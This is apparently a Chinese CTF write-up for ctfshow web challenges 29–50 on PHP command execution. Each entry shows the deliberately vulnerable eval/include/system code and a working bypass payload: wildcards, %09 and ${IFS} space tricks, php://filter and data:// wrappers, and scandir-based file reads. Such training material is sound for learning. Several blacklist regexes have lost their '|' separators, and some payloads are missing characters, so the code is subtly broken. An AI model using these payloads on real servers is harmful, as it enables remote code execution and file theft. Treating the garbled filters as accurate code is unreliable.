ctfshow- web入门命令执行(上)29-50

web29

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

过滤了flag 首先看一下目录有什么文件 ?c=echo system('ls');

方法很多种

?c=echo%20`cat%20f???.php`;
?c=echo `nl fl''ag.php`;
?c=echo system('cat f*');

flag{ae29365d-40d0-480c-b4d7-2f13c1e59e76}

web30

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flagsystemphp/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

过滤了flag sysytem php

和上题一样使用反引号来执行系统命令

使用通配符或*绕过过滤flag和php

?c=echo cat f*;

flag{586e57e4-cd75-4dfe-9db9-dfada4998a6e}

web31

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flagsystemphpcatsortshell\. \'/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

可以命令执行的函数

绕过空格转自CSDN

1、linux

%09 符号需要php环境
{cat,flag.txt} 
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
kg=$'\x20flag.txt'&&cat$kg
(\x20转换成字符串就是空格，这里通过变量的方式巧妙绕过)

2、windows下

(实用性不是很广，也就type这个命令可以用）
type.\flag.txt
type,flag.txt
echo,123456

Linux读文件

cat 查看文件内容
more 分页浏览文件内容
head 显示文件前几行
tail  显示文件的后几行
tac 命令是 cat 反向写的，它们的功能也相反
nl 命令的作用和 cat -n 类似，是将文件内容全部显示在屏幕上，并且是从第一行开始显示，同时会自动打印出行号。
less与 more 类似，但在用 more 时候可能不能向上翻页，不能向上搜索指定字符串，而 less 却可以自由的向上向下翻页，也可以自由的向上向下搜索指定字符串。
file -f  可以利用报错将文件内容带出来（-f<名称文件> 　指定名称文件，其内容有一个或多个文件名称时，让file依序辨识这些文件，格式为每列一个文件名称。）

这里使用反引号执行命令 使用nl读文件 使用%09绕过空格 使用*绕过flag过滤

?c=echo%09`nl%09f*`;

flag{c2ae7f9e-4b53-46c3-a135-1a431f1c9835}

web32

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flagsystemphpcatsortshell\. \'\`echo\;\(/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

过滤了括号 分号 分号可以用?>绕过 使用include来将flag.php包含进来 但是包含进来的php代码不显示 所以结合伪协议读出flag /?c=include$_GET["a"]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

flag{929f27b2-e503-462e-b5e8-12453981ba6f}

web33

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flagsystemphpcatsortshell\. \'\`echo\;\(\"/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

flag{31dd87f1-2229-476a-973b-79a01aafde5c}

web34

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 04:21:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flagsystemphpcatsortshell\. \'\`echo\;\(\:\"/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

flag{83e18871-384e-456b-a377-d9b26f5c26a5}

web35

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 04:21:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flagsystemphpcatsortshell\. \'\`echo\;\(\:\"\<\=/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

/?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

flag{06c2b8b7-2cec-42aa-a9e4-21bd315c5fbb}

web36

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 04:21:16
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flagsystemphpcatsortshell\. \'\`echo\;\(\:\"\<\=\/[0-9]/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

payload同上

?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

flag{0f6540fa-806c-4006-a397-ae11a2af3231}

web37

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;

    }

}else{
    highlight_file(__FILE__);
}

利用伪协议中data:// 协议执行php代码 flag使用*绕过 ?c=data://text/plain,<?php%20echo%20system(%27cat%20fl*%27);?> flag{85557ae9-7c31-40e1-9425-fa4be0706389}

或者

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

base64解码为

base64为php中的加密 正常的base64加密不管用

web38

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flagphpfile/i", $c)){
        include($c);
        echo $flag;

    }

}else{
    highlight_file(__FILE__);
}

payload同上

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

flag{94c14a14-94e6-42f1-ba23-a704e23b0e92}

web39

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }

}else{
    highlight_file(__FILE__);
}

?c=data://text/plain,<?php%20echo%20system(%27cat%20fl*%27);?>

flag{f938e65e-07fd-47f9-a9d4-70c0a42dd01a}

web40

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:03:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]\~\`\@\#\\$\%\^\&\*\（\）\-\=\+\{\[\]\}\:\'\"\,\<\.\>\/\?\\\\/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

无参数读文件及RCE

正则中的括号不是英文的 是过滤了中文的括号……

print_r(scandir(‘.’));查看当前目录下的所有文件名

但是’.’是不能用的

localeconv() 函数返回一包含本地数字及货币格式信息的数组

可以利用localeconv()

current()返回数组中的单元，默认取第一个值：

?c=print_r(scandir(current(localeconv()))); 打印出当前目录文件 或者使用print_r(scandir(pos(localeconv())));，pos是current的别名 如果都被过滤还可以使用reset()，该函数返回数组第一个单元的值，如果数组为空则返回 FALSE

array_reverse() 以相反的元素顺序返回数组

flag在倒数第二个 使用

next(array_reverse())

?c=show_source(next(array_reverse(scandir(current(localeconv())))));

flag{002e5bab-55f6-4ac5-9d9d-5366a13e23e2}

大佬的尝试

web41

<?php

/*
# -*- coding: utf-8 -*-
# @Author: 羽
# @Date:   2020-09-05 20:31:22
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:40:07
# @email: 1341963450@qq.com
# @link: https://ctf.show

*/

if(isset($_POST['c'])){
    $c = $_POST['c'];
if(!preg_match('/[0-9][a-z]\^\+\~\$\[\]\{\}\&\-/i', $c)){
        eval("echo($c);");
    }
}else{
    highlight_file(__FILE__);
}
?>

不会写看wp https://wp.ctf.show/d/137-ctfshow-web-web41

web42

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 20:51:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}

后边>/dev/null 2>&1相当于无回显 使用命令分隔符将后边隔开就行

?c=cat%20flag.php;

flag{c44007d5-cea0-4ab0-9831-b1115918fad5}

web43

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:32:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

过滤了 ; 和cat

可以使用来分割命令使用more绕过cat ?c=more%20flag.php flag{78dc3068-f906-4e3e-94ee-42415721ed55}

web44

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:32:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;catflag/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

?c=more%20fla*

ctfshow{5a2ba941-4b16-4259-8b82-6f091df28f62}

web45

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:35:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;catflag /i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

多了个过滤空格使用%09绕过 ?c=more%09fl*

ctfshow{87f59032-7a84-4f06-a8e8-b3cd802b1e53}

web46

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:50:19
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;catflag [0-9]\\$\*/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

增加了过滤数字 $ *

?c=more%09fla?.php

ctfshow{141af466-6482-457d-98f6-93964c2a3eee}

web47

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:59:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;catflag [0-9]\\$\*morelessheadsorttail/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

?c=tac%09fla?.php

web48

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:06:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;catflag [0-9]\\$\*morelessheadsorttailsedcutawkstringsodcurl\`/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

?c=tac%09fla?.php

web49

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:22:43
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;catflag [0-9]\\$\*morelessheadsorttailsedcutawkstringsodcurl\`\%/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

?c=tac%09fl?g.php

web50

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:32:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;catflag [0-9]\\$\*morelessheadsorttailsedcutawkstringsodcurl\`\%\x09\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

%09被过滤使用<>代替空格 <>和?同时使用不回显 所以用\代替？

c=tac<>fla\g.php